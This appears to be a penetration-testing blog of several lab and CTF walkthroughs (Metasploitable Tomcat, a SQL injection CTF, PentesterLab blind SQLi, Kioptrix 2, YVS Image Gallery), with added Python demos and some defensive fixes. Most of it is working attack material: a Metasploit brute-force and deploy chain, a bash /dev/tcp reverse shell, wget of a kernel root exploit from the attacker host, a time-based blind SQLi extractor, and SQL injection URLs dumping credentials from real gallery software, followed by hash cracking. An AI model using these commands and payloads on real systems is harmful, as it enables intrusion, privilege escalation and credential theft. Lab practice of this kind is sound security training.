Posted by Infosec Shinobi | Posted in Security Videos | Posted on 09-12-2014
This video demonstrates how to exploit the Apache Tomcat service on Metasploitable. Metasploitable is another intentionally vulnerable VM designed for practising penetration testing.
In this video, I show how to scan the system, find one of the vulnerable services (Apache Tomcat), exploit it for a shell as the tomcat user, and then escalate to root.
Steps
Use Netdiscover to get the IP address of our target (Reconnaissance)
Use Nmap to do a detailed scan of the target (Information Gathering)
Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
Use Metasploit to upload and execute the payload (Remote Access)
Use Metasploit to gain root privileges (Privilege Escalation)
Commands
ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
background
use exploit/linux/local/udev_netlink
sessions -l
set SESSION 1
exploit
id
whoami
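The login brute force above only works because the Tomcat manager is reachable with a default account. The script below is an added defensive example (not from the video or from Metasploit) that audits a tomcat-users.xml for exactly that condition. The weak-credential list is an assumed subset of what tomcat_mgr_login tries, the manager/admin role names are Tomcat's own (plain "manager" in Tomcat 6, manager-gui/-script/-jmx/-status from Tomcat 7 on), and the sample file is constructed for the example.

```python
import xml.etree.ElementTree as ET

# Assumed subset of the username/password pairs tomcat_mgr_login tries first;
# ("tomcat", "s3cret") is the commented-out sample in Tomcat's shipped file.
WEAK_CREDS = {
    ("tomcat", "tomcat"), ("admin", "admin"), ("admin", ""),
    ("tomcat", "s3cret"), ("manager", "manager"), ("role1", "tomcat"),
}

# Roles that grant access to the manager or host-manager applications.
MANAGER_ROLES = {"manager", "manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin", "admin-gui", "admin-script"}

# Constructed sample file, modelled on a Tomcat 6 style tomcat-users.xml.
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="role1" password="tomcat" roles="tomcat"/>
  <user username="deploy" password="9f2Qz!Lw4#vT" roles="manager"/>
</tomcat-users>
"""


def local_name(tag):
    """Strip the xmlns prefix that Tomcat 7+ files carry on every element."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, severity, reason) for every account worth fixing:
    default credentials on a manager-capable account is what the Metasploit
    chain above depends on, so that is the critical case."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if local_name(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        weak = (name, password) in WEAK_CREDS
        privileged = bool(roles & MANAGER_ROLES)
        if weak and privileged:
            findings.append((name, "critical", "default credentials with manager access"))
        elif weak:
            findings.append((name, "medium", "default credentials"))
        elif privileged and len(password) < 12:
            findings.append((name, "low", "short password on a manager account"))
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("%s: %s (%s)" % finding)
```

Run it against a real file with `audit_tomcat_users(open("/etc/tomcat6/tomcat-users.xml").read())`; on the sample above it flags the tomcat account as critical and role1 as medium, while the deploy account with a long password passes.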
Notes
Song – Bucie feat Heavy K – Easy to Love
Video Length – 8minutes
Conclusion
At the end of it all, we were able to get a remote root shell starting from a vulnerable Apache Tomcat service. In a real-world pentest we would go on to explore the machine and retrieve as much sensitive information as possible, and we could use this machine to pivot into the rest of the network.
The CTF was based mostly on SQL Injection vulnerabilities found in web applications. The goal was to find 2 hidden flags and submit them to ctf.NotSoSecure.com and to also stand a chance at getting one free ticket to the AppSec USA Conference plus $125 cash.
Find below a workthrough of how I did this
Steps
I started off by trying to guess usernames/passwords using common ones such as admin/admin, admin/pass, admin/1234, etc., but the web application kept throwing up errors.
So the next step was to check the requests being sent to, and the responses received from, the server.
I configured Burp Proxy so I could intercept all requests; looking closely, I noticed an additional piece of data embedded in the 302 response I got: "7365637265745f72656769737465722e68746d6c".
I immediately sent it to the hex decoder, decoded it to plain text and, lo and behold, I had "secret_register.html".
So I fired up my browser again and visited "http://ctf.notsosecure.com/71367217217126217712/secret_register.html".
Right before me was a "Registration Page". I then tried registering with admin but got an error that the username "admin" had been taken.
Next step was to sign up using another username. This time, I used "hax0r123" and I was able to register and I eventually logged in as user "hax0r123".
After checking everything else, I resorted to checking my cookies and realised I had 2 cookies : PHPSESSID and session_id.
The session_id cookie looked suspicious, especially because it looked like a base64-encoded string. I fired up my browser again and visited http://www.snarkles.net/scripts/sneak/sneak.php to decode it. Decoded, it turned out to be the email address we registered with.
I then tried re-registering with the email "testing1234@test.com" and saw the same thing: the registered email address gets base64-encoded and reflected back to the page in the cookie.
Next step was to register with username : bb' or 'bb' = 'bb
When sent, the server builds a query along the lines of SELECT * FROM users WHERE username='bb' or 'bb'='bb' (we are assuming that the table "users" and the column "username" exist). The injected OR makes the WHERE clause true for every row, so the query returns the first row in the table, which is the admin's, rather than ours.
I logged in, viewed the cookie, decrypted the base64 string "YWRtaW5Ac3FsaWxhYnMuY29t" and we had "admin@sqlilabs.com".
The next step was to retrieve the password, but first we had to get the table name.
So we used the query "rotimi' union select (select table_name FROM information_schema.columns WHERE column_name LIKE '%pass%'), '1"
This asks the web app for the name of the table that has a column named like "pass". I registered, checked the cookie field, decoded the string and found we have a table called "users".
Next step was to pull the password from the table "users" using the query
"rotimi' union all select password from users--"
But after this, I discovered we had only one cookie, "PHPSESSID"; the other cookie, "session_id", was gone. I immediately knew there was something wrong with the query: a UNION only works when both SELECTs return the same number of columns, and the original query evidently returns two, so the one-column UNION made the query fail and the application set no cookie at all.
So I added a second column and my new query became
"rotimi' union all select password,null from users–"
I checked the cookies, decoded the session_id value and poof, I had the password "sqlilabRocKs!!".
So I logged in with username/password admin/sqlilabRocKs!! and I was in as the admin.
I also went further to see if we have access to load files using the query
"rotimi' and 1=2 union select load_file('/etc/passwd'),null–"
w000t?!!!
Commands
rotimi' union select (select table_name FROM information_schema.columns WHERE column_name LIKE '%pass%'), '1
rotimi' union all select password from users--
rotimi' union all select password,null from users--
Username : admin@sqlilabs.com
Password: sqlilabRocKs!!
rotimi' and 1=2 union select load_file('/etc/passwd'),null--
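To make the column-count behaviour concrete, here is an added example (my own code, not the CTF's application) that models the registration page: the submitted username is concatenated into a two-column SELECT and the first column of the first row is base64-encoded into the session_id cookie. SQLite stands in for the CTF's MySQL backend, so the information_schema and load_file() steps are not reproduced; the users table, its columns and the rows in it are constructed for the example. The same payloads as above show the admin row coming back, the one-column UNION failing (no cookie), and the two-column UNION leaking the password, next to a parameterised version that shuts all of it down.

```python
import base64
import sqlite3

# Constructed sample data standing in for the CTF database.
SAMPLE_USERS = [
    ("admin", "admin@sqlilabs.com", "sqlilabRocKs!!"),
    ("hax0r123", "testing1234@test.com", "hunter2"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "email TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, email, password) VALUES (?, ?, ?)",
                   SAMPLE_USERS)
    return db


def vulnerable_session_cookie(db, username):
    """Assumed behaviour of the registration page: string concatenation into a
    two-column SELECT, first column of the first row base64-encoded into the
    session_id cookie. A failing query yields no cookie, which is exactly the
    'session_id vanished' symptom seen with the one-column UNION."""
    sql = "SELECT email, id FROM users WHERE username = '" + username + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return None  # e.g. UNION column-count mismatch
    if row is None:
        return None
    return base64.b64encode(str(row[0]).encode()).decode()


def safe_session_cookie(db, username):
    """Same lookup with a bound parameter: the quote and the UNION are data."""
    row = db.execute("SELECT email, id FROM users WHERE username = ?",
                     (username,)).fetchone()
    return None if row is None else base64.b64encode(row[0].encode()).decode()


def decode_cookie(cookie):
    return base64.b64decode(cookie).decode()


if __name__ == "__main__":
    db = make_db()
    for payload in ["hax0r123",
                    "bb' or 'bb'='bb",
                    "rotimi' union all select password from users--",
                    "rotimi' union all select password,null from users--"]:
        cookie = vulnerable_session_cookie(db, payload)
        print(repr(payload), "->", cookie and decode_cookie(cookie))
    print("parameterised:", safe_session_cookie(db, "bb' or 'bb'='bb"))
```

The OR payload decodes to admin@sqlilabs.com because the always-true WHERE returns the first row; the one-column UNION raises a column-count error and so leaves no cookie; the two-column UNION puts the password into the first column of the only row returned.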
Sadly, I wasn't able to get the 2nd flag but then, this exercise was awesome and at the same time challenging.
Posted by Infosec Shinobi | Posted in Security Videos | Posted on 17-10-2013
Difficulty
Intermediate
Details
This video details the exploitation of a blind SQL injection in a PHP-based website and how an attacker can use it to gain access to the administration pages. Then, using this access, the attacker is able to gain code execution on the server through a configuration issue. This video is a detailed walkthrough of a hacking challenge created by PentesterLab.
What you will learn?
Time-based blind SQL injection exploitation
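Time-based extraction is worth seeing end to end, so here is an added example (my own code, not PentesterLab's challenge) of the technique the video covers. The backend is a constructed SQLite database with a user-defined sleep() standing in for MySQL's SLEEP(); the vulnerable handler concatenates an id parameter into its query and returns nothing to the caller, so the only thing that leaks is how long the request takes. Each character is recovered by binary search over its code point, seven timing probes per character instead of up to 95.

```python
import sqlite3
import time

SLEEP_SECONDS = 0.05            # delay the injected condition triggers when true
THRESHOLD = SLEEP_SECONDS / 2   # anything slower than this counts as "true"


def make_backend():
    """Constructed target: SQLite plus a sleep() function so that a
    MySQL-style SLEEP() payload behaves the same way here."""
    db = sqlite3.connect(":memory:")
    db.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'P@ssw0rd')")
    return db


def vulnerable_lookup(db, user_id):
    """Assumed vulnerable handler: the id is concatenated into the query and
    nothing about the result reaches the attacker (fully blind)."""
    db.execute("SELECT username FROM users WHERE id = " + user_id).fetchall()


def time_oracle(db, condition):
    """True when `condition` made the server sleep: the one leaked bit."""
    payload = "1 AND (SELECT CASE WHEN (%s) THEN sleep(%f) ELSE 0 END)" % (
        condition, SLEEP_SECONDS)
    start = time.monotonic()
    vulnerable_lookup(db, payload)
    return time.monotonic() - start >= THRESHOLD


def extract_string(db, subquery, max_len=64):
    """Recover the value of `subquery` one character at a time, binary
    searching the printable-ASCII range with unicode(substr(...))."""
    result = ""
    for pos in range(1, max_len + 1):
        # One probe per position to detect the end of the string.
        if not time_oracle(db, "length((%s)) >= %d" % (subquery, pos)):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if time_oracle(db, "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_backend()
    print(extract_string(db, "SELECT password FROM users WHERE username='admin'"))
```

Against a real target, time_oracle would issue the HTTP request carrying the payload and compare the round-trip time; the threshold then has to be calibrated against the server's normal response time, and a retry on borderline measurements avoids misreading a slow but false probe as true.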
Posted by Infosec Shinobi | Posted in Security Videos | Posted on 30-08-2012
It's been a while since I last updated this blog (I've been working on some projects lately), but I had to steal some time to make this.
In this session, we will be looking at gaining root privileges via command execution.
Overview
Our target system is Kioptrix 2.
Kioptrix is a “Vulnerable-By-Design OS” which serves as a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine.
The video describes a step-by-step way of going about this.
Tools
* Nmap – (Can be found on BackTrack 5-R2)
* Firefox – (Can be found on BackTrack 5-R2)
* Linux Kernel 2.6 local root exploit – (Can be found on exploit-db.com)
Steps
* Discover network for hosts (Netdiscover)
* Scan target network (Nmap)
* Bypass login screen (SQL injection against the MySQL-backed login)
* Set NetCat to listen on attack machine
* Inject bash reverse shell.
* Navigate to directory where apache user can write files (cd /tmp)
* Search for Local privilege escalation exploit for linux kernel version 2.6
* Download exploit code and host it on attack machine
* Use reverse shell to wget exploit code to Victim’s machine
* Compile exploit code and Execute.
* Game Over
Commands
netdiscover -r 192.168.61.0/24
nmap 192.168.61.130 -p 1-65500 -O -sS -sV -v
clear
firefox 192.168.61.130
-> User: admin
-> Password: 1' or '1--
; cat index.php
nc -lvvp 4000
// We want a basic shell on the server, so the netcat listener on port 4000 will catch the connect-back
/bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0
// One line of bash gives us the connect-back shell: /dev/tcp/host/port is bash's TCP pseudo-device, 0< reads stdin from the socket, and 1>&0 2>&0 send stdout and stderr back through the same socket
uname -a
whoami
// we are still the apache user and the objective says we should be "root"
cat /etc/issue
firefox www.exploit-db.com
Search for "linux kernel 2.6"
Download the ip_append_data() local ring0 root exploit (9542.c)
wget 192.168.61.128/9542.c
// Fetch the exploit code "9542.c" onto the victim's machine from the web server on our attack box
gcc 9542.c -o RootMeNow
// Compile the exploit code
./RootMeNow
cat /etc/passwd
cat /etc/passwd && whoami && uname -a
cd /var/www
cd html
ls
whoami
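The foothold in this walkthrough comes from a ping form that pastes the submitted host into a shell command line. Here is an added example (my own code, not the Kioptrix application) of that bug beside the fix. It is written in Python rather than the original PHP so it can be run and checked offline: `echo` stands in for `ping -c 3`, and `; echo INJECTED` stands in for the `; /bin/sh 0</dev/tcp/...` payload used in the video, but the injection point is the same. The host validation pattern and the shape of the handler are assumptions for the example.

```python
import re
import subprocess


def vulnerable_ping(host):
    """Assumed shape of the vulnerable handler: the user-supplied host is
    concatenated into a command that /bin/sh parses, so ';' ends the ping
    command and starts whatever the attacker appended."""
    cmd = "echo ping -c 3 " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Assumed allow-list for a host name or IPv4 address: no shell metacharacters.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})$")


def is_valid_host(host):
    return bool(HOST_RE.match(host))


def safe_ping(host):
    """Hardened handler: reject anything outside the allow-list, then pass the
    host as a single argv element with no shell in between, so even a value
    that slipped past the pattern could not become a second command."""
    if not is_valid_host(host):
        raise ValueError("invalid host")
    return subprocess.run(["echo", "ping", "-c", "3", host],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    attack = "127.0.0.1; echo INJECTED"
    print(vulnerable_ping(attack), end="")
    try:
        safe_ping(attack)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Note that the argv form alone is not a complete fix for a real ping binary: a host of `-f` would be parsed as a flag by ping, which is why the allow-list comes first and why `--` before the host is worth adding when the tool supports it.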
##### #######
# # ## # # ###### # # # # ###### #####
# # # ## ## # # # # # # # #
# #### # # # ## # ##### # # # # ##### # #
# # ###### # # # # # # # # #####
# # # # # # # # # # # # # #
##### # # # # ###### ####### ## ###### # #
YVS Image Gallery is a small database-driven gallery created to be implemented within your existing site. It is only a first attempt at the system and has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading multiple images and creating thumbnails. As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL injection. So basically what I did was exploit this vulnerability.
//Open in Firefox
http://127.0.0.1/server_path/view_all_albums.php
//Check the column count
http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--
http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--
//Get the version, current user and the database name
http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--
//Get all the tables in the database
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--
//Get all the column names
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--
//Get username & password from the table "user"
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--
//The password is an MD5 hash, not encrypted, so we have to crack it
//We save the username:hash pair in a file named "pwd.txt"
//We open a terminal on our BackTrack machine
//We brute-force the hash with John the Ripper and a wordlist
cd /pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the Ripper cracks the hash and gives us the password
//After which we log in to the YVS Image Gallery admin panel
##### #######
# # ## # # ###### # # # # ###### #####
# # # ## ## # # # # # # # #
# #### # # # ## # ##### # # # # ##### # #
# # ###### # # # # # # # # #####
# # # # # # # # # # # # # #
##### # # # # ###### ####### ## ###### # #